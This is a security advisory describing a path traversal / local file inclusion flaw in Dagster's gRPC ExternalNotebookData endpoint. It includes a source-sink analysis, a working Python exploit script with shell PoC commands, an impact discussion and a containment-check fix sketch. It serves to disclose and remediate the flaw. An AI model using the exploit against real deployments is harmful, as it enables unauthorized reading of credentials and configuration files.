Description
A local file inclusion (LFI) vulnerability was found in Dagster's gRPC server implementation. It exists in the ExternalNotebookData endpoint, which is designed to load notebook data for integration with Dagster workflows.
The issue occurs because the get_notebook_data function performs insufficient path validation: it only checks that the file path ends with .ipynb. An attacker with access to the gRPC server can craft requests that include traversal sequences (../) to read any file whose path ends with .ipynb, regardless of where it is located. The use of os.path.abspath() in the implementation does not prevent directory traversal; it only normalizes the path.
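The point about os.path.abspath() can be illustrated with a minimal sketch. The helper name passes_extension_check and the directory /opt/dagster/notebooks are hypothetical and chosen only for illustration; the result shown assumes a POSIX system.

```python
import os


def passes_extension_check(notebook_path: str) -> bool:
    # Hypothetical stand-in for the suffix-only validation described above.
    return notebook_path.endswith(".ipynb")


# Assumed example path: starts in a notebooks directory, then climbs out of it.
candidate = "/opt/dagster/notebooks/../../../tmp/secret.ipynb"

# abspath collapses the ../ segments but does not restrict where the path ends up.
resolved = os.path.abspath(candidate)

print(passes_extension_check(candidate))
print(resolved)
```

The normalized path points outside the notebooks directory, yet the suffix check still passes, which is why normalization alone is not a containment control.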
By default, the gRPC server binds to localhost, limiting remote exploitation. However, in custom deployments where the server is bound to external interfaces or in cloud-based deployments, the vulnerability could allow unauthorized file access.
Source-Sink Analysis
- Source: The user-controlled input originates from the notebook_path field in gRPC requests to the ExternalNotebookData endpoint in server.py.
- Processing: The get_notebook_data function in impl.py performs only a simple extension check.
- Sink: The vulnerability occurs at the open(os.path.abspath(notebook_path), "rb") call, which opens files based on user-controlled input with insufficient sanitization.
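The source-to-sink flow can be reproduced locally without gRPC. The following is a hedged re-creation of the pattern described in this section, not Dagster's actual source: the function name load_notebook_sketch, the error message, and the temporary directory layout are all assumptions.

```python
import os
import tempfile


def load_notebook_sketch(notebook_path: str) -> bytes:
    # Processing: only the extension is checked (hypothetical re-creation).
    if not notebook_path.endswith(".ipynb"):
        raise ValueError("Expected a path ending in .ipynb")
    # Sink: the path is normalized and opened with no containment check.
    with open(os.path.abspath(notebook_path), "rb") as f:
        return f.read()


with tempfile.TemporaryDirectory() as root:
    # Assumed layout: notebooks are meant to live in <root>/notebooks.
    notebooks = os.path.join(root, "notebooks")
    os.makedirs(notebooks)

    # A file outside the notebooks directory that happens to end in .ipynb.
    with open(os.path.join(root, "secret.ipynb"), "wb") as f:
        f.write(b"SECRET_DATA_12345\n")

    # Source: attacker-style input that climbs out of the notebooks directory.
    traversal = os.path.join(notebooks, "..", "secret.ipynb")
    leaked = load_notebook_sketch(traversal)

print(leaked)
```

In this sketch the file outside the intended directory is returned in full, because nothing between the source and the sink ties the path to an allowed location.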
PoC
- Create a target file to read:
echo "SECRET_DATA_12345" > /tmp/secret.ipynb
- Start the Dagster gRPC server:
dagster api grpc --python-file repository.py --host 0.0.0.0 --port 4266
- Use the following exploit script:
import grpc
import sys
from dagster._grpc.__generated__ import dagster_api_pb2
from dagster._grpc.__generated__ import dagster_api_pb2_grpc


def exploit_lfi(host, port, target_file):
    # create a gRPC channel to the server
    channel = grpc.insecure_channel(f"{host}:{port}")
    # create a stub
    stub = dagster_api_pb2_grpc.DagsterApiStub(channel)
    # the server only accepts paths ending in .ipynb
    if not target_file.endswith(".ipynb"):
        target_file = target_file + ".ipynb"
    # create the request
    request = dagster_api_pb2.ExternalNotebookDataRequest(notebook_path=target_file)
    try:
        # send the request
        response = stub.ExternalNotebookData(request)
        # print the response
        print(response.content.decode('utf-8', errors='replace'))
        return True
    except grpc.RpcError as e:
        print(f"RPC Error: {e.details()}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_file>", file=sys.stderr)
        sys.exit(1)
    HOST = "localhost"
    PORT = 4266
    target_file = sys.argv[1]
    exploit_lfi(HOST, PORT, target_file)
- Run the exploit to read a file using path traversal:
python exploit.py "../../../../tmp/secret"
Impact
The vulnerability allows an attacker with access to the gRPC server to read arbitrary files that the Dagster process has permission to access, as long as the requested path ends with .ipynb. This could potentially expose:
- Configuration files containing credentials
- API keys and access tokens
- Database connection strings
- Other sensitive information within readable files
The severity is mitigated by several factors:
- By default, the gRPC server only listens on localhost, limiting remote exploitation
- The attacker must have network access to the gRPC port
- The attack is limited to reading files, not writing or executing code
However, in non-default configurations where the gRPC server is exposed to untrusted networks or in multi-tenant environments, this could lead to unauthorized access to sensitive information.
Fix
- https://github.com/dagster-io/dagster/pull/30002
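For readers who want a general picture of how this class of bug is usually closed, the following is a minimal sketch of a containment check. It is not taken from the linked pull request and may differ from the actual fix. The function name resolve_inside and the notion of a configured base directory are assumptions made for illustration.

```python
import os
import tempfile


def resolve_inside(base_dir: str, notebook_path: str) -> str:
    # Hypothetical helper: resolve symlinks and ../ segments on both sides first.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, notebook_path))
    if not target.endswith(".ipynb"):
        raise ValueError("Expected a path ending in .ipynb")
    # Reject anything that resolves outside the allowed base directory.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("Notebook path escapes the allowed directory")
    return target


with tempfile.TemporaryDirectory() as base:
    # A path inside the base directory is accepted.
    ok = resolve_inside(base, "report.ipynb")
    # A traversal attempt is rejected before any file is opened.
    try:
        resolve_inside(base, "../secret.ipynb")
        blocked = False
    except PermissionError:
        blocked = True

print(ok, blocked)
```

Comparing resolved paths with os.path.commonpath avoids the prefix-matching pitfall of startswith, where a sibling directory such as /data/notebooks_evil would pass a check against /data/notebooks.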